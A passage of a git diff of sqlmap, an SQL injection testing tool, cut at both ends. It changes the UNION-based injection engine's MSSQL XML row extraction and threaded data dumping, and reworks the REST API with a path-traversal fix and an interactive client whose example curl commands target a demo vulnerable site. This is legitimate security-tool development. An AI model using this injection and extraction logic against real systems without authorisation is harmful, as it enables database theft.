removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), \ - extractRegexResult(regex, removeReflectiveValues(listToStrValue(headers.headers \ - if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), \ - None) + if not kb.rowXmlMode: + # Parse the returned page to get the exact UNION-based + # SQL injection output + def _(regex): + return reduce(lambda x, y: x if x is not None else y, (\ + extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), \ + extractRegexResult(regex, removeReflectiveValues(listToStrValue(headers.headers \ + if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), \ + None) - # Automatically patching last char trimming cases - if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""): - warnMsg = "automatically patching output having last char trimmed" - singleTimeWarnMessage(warnMsg) - page = page.replace(kb.chars.stop[:-1], kb.chars.stop) + # Automatically patching last char trimming cases + if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""): + warnMsg = "automatically patching output having last char trimmed" + singleTimeWarnMessage(warnMsg) + page = page.replace(kb.chars.stop[:-1], kb.chars.stop) - retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop)) + retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop)) + else: + output = extractRegexResult(r"(?P<result>(<row.+?/>)+)", page) + if output: + try: + root = xml.etree.ElementTree.fromstring("<root>%s</root>" % output.encode(UNICODE_ENCODING)) + retVal = "" + for column in kb.dumpColumns: + base64 = True + for child in root: + value = child.attrib.get(column, "").strip() + if value and not re.match(r"\A[a-zA-Z0-9+/]+={0,2}\Z", value): + base64 = False + break + + try: + value.decode("base64") + except binascii.Error: + base64 = False + break + + if base64: + for child in root: + child.attrib[column] = child.attrib.get(column, "").decode("base64") or NULL + + for child in root: + row = [] + for column in kb.dumpColumns: + row.append(child.attrib.get(column, NULL)) + retVal += "%s%s%s" % (kb.chars.start, kb.chars.delimiter.join(row), kb.chars.stop) + + except: + pass + else: + retVal = getUnicode(retVal) if retVal is not None: retVal = getUnicode(retVal, kb.pageEncoding) - # Special case when DBMS is Microsoft SQL Server and error message is used as a result of union injection + # Special case when DBMS is Microsoft SQL Server and error message is used as a result of UNION injection if Backend.isDbms(DBMS.MSSQL) and wasLastResponseDBMSError(): retVal = htmlunescape(retVal).replace("<br>", "\n") - hashDBWrite("%s%s" % (conf.hexConvert, expression), retVal) - else: + hashDBWrite("%s%s" % (conf.hexConvert or False, expression), retVal) + + elif not kb.rowXmlMode: trimmed = _("%s(?P<result>.*?)<" % (kb.chars.start)) if trimmed: @@ -110,6 +154,9 @@ def _oneShotUnionUse(expression, unpack=True, limited=False): warnMsg += "(probably due to its length and/or content): " warnMsg += safecharencode(trimmed) logger.warn(warnMsg) + else: + vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector + kb.unionDuplicates = vector[7] return retVal @@ -148,9 +195,9 @@ def configUnion(char=None, columns=None): def unionUse(expression, unpack=True, dump=False): """ - This function tests for an union SQL injection on the target + This function tests for an UNION SQL injection on the target URL then call its subsidiary function to effectively perform an - union SQL injection on the affected URL + UNION SQL injection on the affected URL """ initTechnique(PAYLOAD.TECHNIQUE.UNION) @@ -168,11 +215,18 @@ def unionUse(expression, unpack=True, dump=False): _, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr) # Set kb.partRun in case the engine is called from the API - kb.partRun = getPartRun(alias=False) if hasattr(conf, "api") else None + kb.partRun = getPartRun(alias=False) if conf.api else None + + if Backend.isDbms(DBMS.MSSQL) and kb.dumpColumns: + kb.rowXmlMode = True + _ = "(%s FOR XML RAW, BINARY BASE64)" % expression + output = _oneShotUnionUse(_, False) + value = parseUnionPage(output) + kb.rowXmlMode = False if expressionFieldsList and len(expressionFieldsList) > 1 and "ORDER BY" in expression.upper(): # Removed ORDER BY clause because UNION does not play well with it - expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) + expression = re.sub("(?i)\s*ORDER BY\s+[\w,]+", "", expression) debugMsg = "stripping ORDER BY clause from statement because " debugMsg += "it does not play well with UNION query SQL injection" singleTimeDebugMessage(debugMsg) @@ -182,7 +236,7 @@ def unionUse(expression, unpack=True, dump=False): # SQL limiting the query output one entry at a time # NOTE: we assume that only queries that get data from a table can # return multiple entries - if (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ + if value is None and (kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.NEGATIVE or \ kb.forcePartialUnion or \ (dump and (conf.limitStart or conf.limitStop)) or "LIMIT " in expression.upper()) and \ " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() \ @@ -230,118 +284,127 @@ def unionUse(expression, unpack=True, dump=False): value = [] # for empty tables return value - threadData = getCurrentThreadData() - threadData.shared.limits = iter(xrange(startLimit, stopLimit)) - numThreads = min(conf.threads, (stopLimit - startLimit)) - threadData.shared.value = BigArray() - threadData.shared.buffered = [] - threadData.shared.counter = 0 - threadData.shared.lastFlushed = startLimit - 1 - threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 + if isNumPosStrValue(count) and int(count) > 1: + threadData = getCurrentThreadData() - if threadData.shared.showEta: - threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) + try: + threadData.shared.limits = iter(xrange(startLimit, stopLimit)) + except OverflowError: + errMsg = "boundary limits (%d,%d) are too large. Please rerun " % (startLimit, stopLimit) + errMsg += "with switch '--fresh-queries'" + raise SqlmapDataException(errMsg) - if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: - kb.suppressResumeInfo = True - debugMsg = "suppressing possible resume console info because of " - debugMsg += "large number of rows. It might take too long" - logger.debug(debugMsg) + numThreads = min(conf.threads, (stopLimit - startLimit)) + threadData.shared.value = BigArray() + threadData.shared.buffered = [] + threadData.shared.counter = 0 + threadData.shared.lastFlushed = startLimit - 1 + threadData.shared.showEta = conf.eta and (stopLimit - startLimit) > 1 - try: - def unionThread(): - threadData = getCurrentThreadData() + if threadData.shared.showEta: + threadData.shared.progress = ProgressBar(maxValue=(stopLimit - startLimit)) - while kb.threadContinue: - with kb.locks.limit: - try: - valueStart = time.time() - threadData.shared.counter += 1 - num = threadData.shared.limits.next() - except StopIteration: + if stopLimit > TURN_OFF_RESUME_INFO_LIMIT: + kb.suppressResumeInfo = True + debugMsg = "suppressing possible resume console info because of " + debugMsg += "large number of rows. It might take too long" + logger.debug(debugMsg) + + try: + def unionThread(): + threadData = getCurrentThreadData() + + while kb.threadContinue: + with kb.locks.limit: + try: + valueStart = time.time() + threadData.shared.counter += 1 + num = threadData.shared.limits.next() + except StopIteration: + break + + if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): + field = expressionFieldsList[0] + elif Backend.isDbms(DBMS.ORACLE): + field = expressionFieldsList + else: + field = None + + limitedExpr = agent.limitQuery(num, expression, field) + output = _oneShotUnionUse(limitedExpr, unpack, True) + + if not kb.threadContinue: break - if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): - field = expressionFieldsList[0] - elif Backend.isDbms(DBMS.ORACLE): - field = expressionFieldsList - else: - field = None + if output: + with kb.locks.value: + if all(_ in output for _ in (kb.chars.start, kb.chars.stop)): + items = parseUnionPage(output) - limitedExpr = agent.limitQuery(num, expression, field) - output = _oneShotUnionUse(limitedExpr, unpack, True) + if threadData.shared.showEta: + threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) + if isListLike(items): + # in case that we requested N columns and we get M!=N then we have to filter a bit + if len(items) > 1 and len(expressionFieldsList) > 1: + items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)] + items = [_ for _ in flattenValue(items)] + if len(items) > len(expressionFieldsList): + filtered = OrderedDict() + for item in items: + key = re.sub(r"[^A-Za-z0-9]", "", item).lower() + if key not in filtered or re.search(r"[^A-Za-z0-9]", item): + filtered[key] = item + items = filtered.values() + items = [items] + index = None + for index in xrange(1 + len(threadData.shared.buffered)): + if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: + break + threadData.shared.buffered.insert(index or 0, (num, items)) + else: + index = None + if threadData.shared.showEta: + threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) + for index in xrange(1 + len(threadData.shared.buffered)): + if index < len(threadData.shared.buffered) and threadData.shared.buffered[index][0] >= num: + break + threadData.shared.buffered.insert(index or 0, (num, None)) - if not kb.threadContinue: - break + items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) - if output: - with kb.locks.value: - if all(map(lambda _: _ in output, (kb.chars.start, kb.chars.stop))): - items = parseUnionPage(output) + while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH): + threadData.shared.lastFlushed, _ = threadData.shared.buffered[0] + if not isNoneValue(_): + threadData.shared.value.extend(arrayizeValue(_)) + del threadData.shared.buffered[0] - if threadData.shared.showEta: - threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) - if isListLike(items): - # in case that we requested N columns and we get M!=N then we have to filter a bit - if len(items) > 1 and len(expressionFieldsList) > 1: - items = [item for item in items if isListLike(item) and len(item) == len(expressionFieldsList)] - items = [_ for _ in flattenValue(items)] - if len(items) > len(expressionFieldsList): - filtered = OrderedDict() - for item in items: - key = re.sub(r"[^A-Za-z0-9]", "", item).lower() - if key not in filtered or re.search(r"[^A-Za-z0-9]", item): - filtered[key] = item - items = filtered.values() - items = [items] - index = None - for index in xrange(len(threadData.shared.buffered)): - if threadData.shared.buffered[index][0] >= num: - break - threadData.shared.buffered.insert(index or 0, (num, items)) - else: - index = None - if threadData.shared.showEta: - threadData.shared.progress.progress(time.time() - valueStart, threadData.shared.counter) - for index in xrange(len(threadData.shared.buffered)): - if threadData.shared.buffered[index][0] >= num: - break - threadData.shared.buffered.insert(index or 0, (num, None)) + if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta: + _ = ','.join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items + status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", _ if kb.safeCharEncode else safecharencode(_)) - items = output.replace(kb.chars.start, "").replace(kb.chars.stop, "").split(kb.chars.delimiter) + if len(status) > width: + status = "%s..." % status[:width - 3] - while threadData.shared.buffered and (threadData.shared.lastFlushed + 1 >= threadData.shared.buffered[0][0] or len(threadData.shared.buffered) > MAX_BUFFERED_PARTIAL_UNION_LENGTH): - threadData.shared.lastFlushed, _ = threadData.shared.buffered[0] - if not isNoneValue(_): - threadData.shared.value.extend(arrayizeValue(_)) - del threadData.shared.buffered[0] + dataToStdout("%s\n" % status) - if conf.verbose == 1 and not (threadData.resumed and kb.suppressResumeInfo) and not threadData.shared.showEta: - status = "[%s] [INFO] %s: %s" % (time.strftime("%X"), "resumed" if threadData.resumed else "retrieved", safecharencode(",".join("\"%s\"" % _ for _ in flattenValue(arrayizeValue(items))) if not isinstance(items, basestring) else items)) + runThreads(numThreads, unionThread) - if len(status) > width: - status = "%s..." % status[:width - 3] + if conf.verbose == 1: + clearConsoleLine(True) - dataToStdout("%s\n" % status, True) + except KeyboardInterrupt: + abortedFlag = True - runThreads(numThreads, unionThread) + warnMsg = "user aborted during enumeration. sqlmap " + warnMsg += "will display partial output" + logger.warn(warnMsg) - if conf.verbose == 1: - clearConsoleLine(True) - - except KeyboardInterrupt: - abortedFlag = True - - warnMsg = "user aborted during enumeration. sqlmap " - warnMsg += "will display partial output" - logger.warn(warnMsg) - - finally: - for _ in sorted(threadData.shared.buffered): - if not isNoneValue(_[1]): - threadData.shared.value.extend(arrayizeValue(_[1])) - value = threadData.shared.value - kb.suppressResumeInfo = False + finally: + for _ in sorted(threadData.shared.buffered): + if not isNoneValue(_[1]): + threadData.shared.value.extend(arrayizeValue(_[1])) + value = threadData.shared.value + kb.suppressResumeInfo = False if not value and not abortedFlag: output = _oneShotUnionUse(expression, unpack) diff --git a/lib/utils/__init__.py b/lib/utils/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/lib/utils/__init__.py +++ b/lib/utils/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/lib/utils/api.py b/lib/utils/api.py index c007289b5..9c41412c8 100644 --- a/lib/utils/api.py +++ b/lib/utils/api.py @@ -2,21 +2,26 @@ # -*- coding: utf-8 -*- """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ +import contextlib import logging import os +import re +import shlex +import socket import sqlite3 import sys import tempfile import time +import urllib2 -from subprocess import PIPE - +from lib.core.common import dataToStdout +from lib.core.common import getSafeExString +from lib.core.common import saveConfig from lib.core.common import unArrayizeValue -from lib.core.convert import base64pickle from lib.core.convert import hexencode from lib.core.convert import dejsonize from lib.core.convert import jsonize @@ -27,12 +32,17 @@ from lib.core.data import logger from lib.core.datatype import AttribDict from lib.core.defaults import _defaults from lib.core.enums import CONTENT_STATUS +from lib.core.enums import MKSTEMP_PREFIX from lib.core.enums import PART_RUN_CONTENT_TYPES from lib.core.exception import SqlmapConnectionException from lib.core.log import LOGGER_HANDLER from lib.core.optiondict import optDict +from lib.core.settings import RESTAPI_DEFAULT_ADAPTER from lib.core.settings import IS_WIN +from lib.core.settings import RESTAPI_DEFAULT_ADDRESS +from lib.core.settings import RESTAPI_DEFAULT_PORT from lib.core.subprocessng import Popen +from lib.parse.cmdline import cmdLineParser from thirdparty.bottle.bottle import error as return_error from thirdparty.bottle.bottle import get from thirdparty.bottle.bottle import hook @@ -40,9 +50,7 @@ from thirdparty.bottle.bottle import post from thirdparty.bottle.bottle import request from thirdparty.bottle.bottle import response from thirdparty.bottle.bottle import run - -RESTAPI_SERVER_HOST = "127.0.0.1" -RESTAPI_SERVER_PORT = 8775 +from thirdparty.bottle.bottle import server_names # global settings @@ -62,7 +70,7 @@ class Database(object): self.cursor = None def connect(self, who="server"): - self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None) + self.connection = sqlite3.connect(self.database, timeout=3, isolation_level=None, check_same_thread=False) self.cursor = self.connection.cursor() logger.debug("REST-JSON API %s connected to IPC database" % who) @@ -84,7 +92,7 @@ class Database(object): else: self.cursor.execute(statement) except sqlite3.OperationalError, ex: - if not "locked" in ex.message: + if not "locked" in getSafeExString(ex): raise else: break @@ -112,7 +120,8 @@ class Database(object): class Task(object): - def __init__(self, taskid): + def __init__(self, taskid, remote_addr): + self.remote_addr = remote_addr self.process = None self.output_directory = None self.options = None @@ -154,12 +163,21 @@ class Task(object): self.options = AttribDict(self._original_options) def engine_start(self): - self.process = Popen(["python", "sqlmap.py", "--pickled-options", base64pickle(self.options)], - shell=False, stdin=PIPE, close_fds=not IS_WIN) + handle, configFile = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.CONFIG, text=True) + os.close(handle) + saveConfig(self.options, configFile) + + if os.path.exists("sqlmap.py"): + self.process = Popen(["python", "sqlmap.py", "--api", "-c", configFile], shell=False, close_fds=not IS_WIN) + elif os.path.exists(os.path.join(os.getcwd(), "sqlmap.py")): + self.process = Popen(["python", "sqlmap.py", "--api", "-c", configFile], shell=False, cwd=os.getcwd(), close_fds=not IS_WIN) + else: + self.process = Popen(["sqlmap", "--api", "-c", configFile], shell=False, close_fds=not IS_WIN) def engine_stop(self): if self.process: - return self.process.terminate() + self.process.terminate() + return self.process.wait() else: return None @@ -168,9 +186,12 @@ class Task(object): def engine_kill(self): if self.process: - return self.process.kill() - else: - return None + try: + self.process.kill() + return self.process.wait() + except: + pass + return None def engine_get_id(self): if self.process: @@ -211,34 +232,26 @@ class StdDbOut(object): # Ignore all non-relevant messages return - output = conf.database_cursor.execute( - "SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?", - (self.taskid, content_type)) + output = conf.databaseCursor.execute("SELECT id, status, value FROM data WHERE taskid = ? AND content_type = ?", (self.taskid, content_type)) # Delete partial output from IPC database if we have got a complete output if status == CONTENT_STATUS.COMPLETE: if len(output) > 0: for index in xrange(len(output)): - conf.database_cursor.execute("DELETE FROM data WHERE id = ?", - (output[index][0],)) + conf.databaseCursor.execute("DELETE FROM data WHERE id = ?", (output[index][0],)) - conf.database_cursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", - (self.taskid, status, content_type, jsonize(value))) + conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value))) if kb.partRun: kb.partRun = None elif status == CONTENT_STATUS.IN_PROGRESS: if len(output) == 0: - conf.database_cursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", - (self.taskid, status, content_type, - jsonize(value))) + conf.databaseCursor.execute("INSERT INTO data VALUES(NULL, ?, ?, ?, ?)", (self.taskid, status, content_type, jsonize(value))) else: new_value = "%s%s" % (dejsonize(output[0][2]), value) - conf.database_cursor.execute("UPDATE data SET value = ? WHERE id = ?", - (jsonize(new_value), output[0][0])) + conf.databaseCursor.execute("UPDATE data SET value = ? WHERE id = ?", (jsonize(new_value), output[0][0])) else: - conf.database_cursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)", - (self.taskid, str(value) if value else "")) + conf.databaseCursor.execute("INSERT INTO errors VALUES(NULL, ?, ?)", (self.taskid, str(value) if value else "")) def flush(self): pass @@ -249,23 +262,19 @@ class StdDbOut(object): def seek(self): pass - class LogRecorder(logging.StreamHandler): def emit(self, record): """ Record emitted events to IPC database for asynchronous I/O communication with the parent process """ - conf.database_cursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)", - (conf.taskid, time.strftime("%X"), record.levelname, - record.msg % record.args if record.args else record.msg)) - + conf.databaseCursor.execute("INSERT INTO logs VALUES(NULL, ?, ?, ?, ?)", (conf.taskid, time.strftime("%X"), record.levelname, record.msg % record.args if record.args else record.msg)) def setRestAPILog(): - if hasattr(conf, "api"): + if conf.api: try: - conf.database_cursor = Database(conf.database) - conf.database_cursor.connect("client") + conf.databaseCursor = Database(conf.database) + conf.databaseCursor.connect("client") except sqlite3.OperationalError, ex: raise SqlmapConnectionException, "%s ('%s')" % (ex, conf.database) @@ -335,7 +344,9 @@ def task_new(): Create new task ID """ taskid = hexencode(os.urandom(8)) - DataStore.tasks[taskid] = Task(taskid) + remote_addr = request.remote_addr + + DataStore.tasks[taskid] = Task(taskid, remote_addr) logger.debug("Created new task: '%s'" % taskid) return jsonize({"success": True, "taskid": taskid}) @@ -361,31 +372,32 @@ def task_delete(taskid): @get("/admin/<taskid>/list") -def task_list(taskid): +def task_list(taskid=None): """ List task pull """ - if is_admin(taskid): - logger.debug("[%s] Listed task pool" % taskid) - tasks = list(DataStore.tasks) - return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) - else: - logger.warning("[%s] Unauthorized call to task_list()" % taskid) - return jsonize({"success": False, "message": "Unauthorized"}) + tasks = {} + for key in DataStore.tasks: + if is_admin(taskid) or DataStore.tasks[key].remote_addr == request.remote_addr: + tasks[key] = dejsonize(scan_status(key))["status"] + + logger.debug("[%s] Listed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr)) + return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)}) @get("/admin/<taskid>/flush") def task_flush(taskid): """ Flush task spool (delete all tasks) """ - if is_admin(taskid): - DataStore.tasks = dict() - logger.debug("[%s] Flushed task pool" % taskid) - return jsonize({"success": True}) - else: - logger.warning("[%s] Unauthorized call to task_flush()" % taskid) - return jsonize({"success": False, "message": "Unauthorized"}) + + for key in list(DataStore.tasks): + if is_admin(taskid) or DataStore.tasks[key].remote_addr == request.remote_addr: + DataStore.tasks[key].engine_kill() + del DataStore.tasks[key] + + logger.debug("[%s] Flushed task pool (%s)" % (taskid, "admin" if is_admin(taskid) else request.remote_addr)) + return jsonize({"success": True}) ################################## # sqlmap core interact functions # @@ -467,7 +479,9 @@ def scan_stop(taskid): """ Stop a scan """ - if taskid not in DataStore.tasks: + if (taskid not in DataStore.tasks or + DataStore.tasks[taskid].engine_process() is None or + DataStore.tasks[taskid].engine_has_terminated()): logger.warning("[%s] Invalid task ID provided to scan_stop()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) @@ -482,7 +496,9 @@ def scan_kill(taskid): """ Kill a scan """ - if taskid not in DataStore.tasks: + if (taskid not in DataStore.tasks or + DataStore.tasks[taskid].engine_process() is None or + DataStore.tasks[taskid].engine_has_terminated()): logger.warning("[%s] Invalid task ID provided to scan_kill()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) @@ -527,16 +543,11 @@ def scan_data(taskid): return jsonize({"success": False, "message": "Invalid task ID"}) # Read all data from the IPC database for the taskid - for status, content_type, value in DataStore.current_db.execute( - "SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC", - (taskid,)): - json_data_message.append( - {"status": status, "type": content_type, "value": dejsonize(value)}) + for status, content_type, value in DataStore.current_db.execute("SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC", (taskid,)): + json_data_message.append({"status": status, "type": content_type, "value": dejsonize(value)}) # Read all error messages from the IPC database - for error in DataStore.current_db.execute( - "SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC", - (taskid,)): + for error in DataStore.current_db.execute("SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC", (taskid,)): json_errors_message.append(error) logger.debug("[%s] Retrieved scan data and error messages" % taskid) @@ -552,7 +563,7 @@ def scan_log_limited(taskid, start, end): json_log_messages = list() if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to scan_log_limited()") + logger.warning("[%s] Invalid task ID provided to scan_log_limited()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) if not start.isdigit() or not end.isdigit() or end < start: @@ -563,10 +574,7 @@ def scan_log_limited(taskid, start, end): end = max(1, int(end)) # Read a subset of log messages from the IPC database - for time_, level, message in DataStore.current_db.execute( - ("SELECT time, level, message FROM logs WHERE " - "taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC"), - (taskid, start, end)): + for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC", (taskid, start, end)): json_log_messages.append({"time": time_, "level": level, "message": message}) logger.debug("[%s] Retrieved scan log messages subset" % taskid) @@ -581,12 +589,11 @@ def scan_log(taskid): json_log_messages = list() if taskid not in DataStore.tasks: - logger.warning("[%s] Invalid task ID provided to scan_log()") + logger.warning("[%s] Invalid task ID provided to scan_log()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) # Read all log messages from the IPC database - for time_, level, message in DataStore.current_db.execute( - "SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)): + for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)): json_log_messages.append({"time": time_, "level": level, "message": message}) logger.debug("[%s] Retrieved scan log messages" % taskid) @@ -603,14 +610,13 @@ def download(taskid, target, filename): logger.warning("[%s] Invalid task ID provided to download()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) - # Prevent file path traversal - the lame way - if ".." in target: + path = os.path.abspath(os.path.join(paths.SQLMAP_OUTPUT_PATH, target, filename)) + # Prevent file path traversal + if not path.startswith(paths.SQLMAP_OUTPUT_PATH): logger.warning("[%s] Forbidden path (%s)" % (taskid, target)) return jsonize({"success": False, "message": "Forbidden path"}) - path = os.path.join(paths.SQLMAP_OUTPUT_PATH, target) - - if os.path.exists(path): + if os.path.isfile(path): logger.debug("[%s] Retrieved content of file %s" % (taskid, target)) with open(path, 'rb') as inf: file_content = inf.read() @@ -620,16 +626,22 @@ def download(taskid, target, filename): return jsonize({"success": False, "message": "File does not exist"}) -def server(host="0.0.0.0", port=RESTAPI_SERVER_PORT): +def server(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT, adapter=RESTAPI_DEFAULT_ADAPTER): """ REST-JSON API server """ DataStore.admin_id = hexencode(os.urandom(16)) - Database.filepath = tempfile.mkstemp(prefix="sqlmapipc-", text=False)[1] + handle, Database.filepath = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.IPC, text=False) + os.close(handle) + + if port == 0: # random + with contextlib.closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s: + s.bind((host, 0)) + port = s.getsockname()[1] logger.info("Running REST-JSON API server at '%s:%d'.." % (host, port)) logger.info("Admin ID: %s" % DataStore.admin_id) - logger.debug("IPC database: %s" % Database.filepath) + logger.debug("IPC database: '%s'" % Database.filepath) # Initialize IPC database DataStore.current_db = Database() @@ -637,21 +649,187 @@ def server(host="0.0.0.0", port=RESTAPI_SERVER_PORT): DataStore.current_db.init() # Run RESTful API - run(host=host, port=port, quiet=True, debug=False) + try: + # Supported adapters: aiohttp, auto, bjoern, cgi, cherrypy, diesel, eventlet, fapws3, flup, gae, gevent, geventSocketIO, gunicorn, meinheld, paste, rocket, tornado, twisted, waitress, wsgiref + # Reference: https://bottlepy.org/docs/dev/deployment.html || bottle.server_names + + if adapter == "gevent": + from gevent import monkey + monkey.patch_all() + elif adapter == "eventlet": + import eventlet + eventlet.monkey_patch() + logger.debug("Using adapter '%s' to run bottle" % adapter) + run(host=host, port=port, quiet=True, debug=False, server=adapter) + except socket.error, ex: + if "already in use" in getSafeExString(ex): + logger.error("Address already in use ('%s:%s')" % (host, port)) + else: + raise + except ImportError: + if adapter.lower() not in server_names: + errMsg = "Adapter '%s' is unknown. " % adapter + errMsg += "(Note: available adapters '%s')" % ', '.join(sorted(server_names.keys())) + else: + errMsg = "Server support for adapter '%s' is not installed on this system " % adapter + errMsg += "(Note: you can try to install it with 'sudo apt-get install python-%s' or 'sudo pip install %s')" % (adapter, adapter) + logger.critical(errMsg) + +def _client(url, options=None): + logger.debug("Calling %s" % url) + try: + data = None + if options is not None: + data = jsonize(options) + req = urllib2.Request(url, data, {"Content-Type": "application/json"}) + response = urllib2.urlopen(req) + text = response.read() + except: + if options: + logger.error("Failed to load and parse %s" % url) + raise + return text -def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): +def client(host=RESTAPI_DEFAULT_ADDRESS, port=RESTAPI_DEFAULT_PORT): """ REST-JSON API client """ + + dbgMsg = "Example client access from command line:" + dbgMsg += "\n\t$ taskid=$(curl http://%s:%d/task/new 2>1 | grep -o -I '[a-f0-9]\{16\}') && echo $taskid" % (host, port) + dbgMsg += "\n\t$ curl -H \"Content-Type: application/json\" -X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' http://%s:%d/scan/$taskid/start" % (host, port) + dbgMsg += "\n\t$ curl http://%s:%d/scan/$taskid/data" % (host, port) + dbgMsg += "\n\t$ curl http://%s:%d/scan/$taskid/log" % (host, port) + logger.debug(dbgMsg) + addr = "http://%s:%d" % (host, port) logger.info("Starting REST-JSON API client to '%s'..." % addr) - # TODO: write a simple client with requests, for now use curl from command line - logger.error("Not yet implemented, use curl from command line instead for now, for example:") - print "\n\t$ taskid=$(curl http://%s:%d/task/new 2>1 | grep -o -I '[a-f0-9]\{16\}') && echo $taskid" % (host, port) - print ("\t$ curl -H \"Content-Type: application/json\" " - "-X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' " - "http://%s:%d/scan/$taskid/start") % (host, port) - print "\t$ curl http://%s:%d/scan/$taskid/data" % (host, port) - print "\t$ curl http://%s:%d/scan/$taskid/log\n" % (host, port) + try: + _client(addr) + except Exception, ex: + if not isinstance(ex, urllib2.HTTPError): + errMsg = "There has been a problem while connecting to the " + errMsg += "REST-JSON API server at '%s' " % addr + errMsg += "(%s)" % ex + logger.critical(errMsg) + return + + taskid = None + logger.info("Type 'help' or '?' for list of available commands") + + while True: + try: + command = raw_input("api%s> " % (" (%s)" % taskid if taskid else "")).strip() + command = re.sub(r"\A(\w+)", lambda match: match.group(1).lower(), command) + except (EOFError, KeyboardInterrupt): + print + break + + if command in ("data", "log", "status", "stop", "kill"): + if not taskid: + logger.error("No task ID in use") + continue + raw = _client("%s/scan/%s/%s" % (addr, taskid, command)) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command %s" % command) + dataToStdout("%s\n" % raw) + + elif command.startswith("option"): + if not taskid: + logger.error("No task ID in use") + continue + try: + command, option = command.split(" ") + except ValueError: + raw = _client("%s/option/%s/list" % (addr, taskid)) + else: + options = {"option": option} + raw = _client("%s/option/%s/get" % (addr, taskid), options) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to execute command %s" % command) + dataToStdout("%s\n" % raw) + + elif command.startswith("new"): + if ' ' not in command: + logger.error("Program arguments are missing") + continue + + try: + argv = ["sqlmap.py"] + shlex.split(command)[1:] + except Exception, ex: + logger.error("Error occurred while parsing arguments ('%s')" % ex) + taskid = None + continue + + try: + cmdLineOptions = cmdLineParser(argv).__dict__ + except: + taskid = None + continue + + for key in list(cmdLineOptions): + if cmdLineOptions[key] is None: + del cmdLineOptions[key] + + raw = _client("%s/task/new" % addr) + res = dejsonize(raw) + if not res["success"]: + logger.error("Failed to create new task") + continue + taskid = res["taskid"] + logger.info("New task ID is '%s'" % taskid) + + raw = _client("%s/scan/%s/start" % (addr, taskid), cmdLineOptions) + res = dejsonize(raw) + if not 